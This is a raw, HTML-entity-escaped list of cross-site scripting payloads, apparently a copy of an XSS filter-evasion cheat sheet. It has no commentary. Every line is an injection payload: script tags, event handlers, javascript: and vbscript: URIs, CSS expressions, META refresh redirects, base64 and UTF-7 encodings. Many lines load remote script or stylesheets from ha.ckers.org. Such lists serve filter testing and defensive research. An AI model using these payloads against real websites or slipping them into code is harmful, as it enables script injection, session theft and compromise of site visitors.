&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
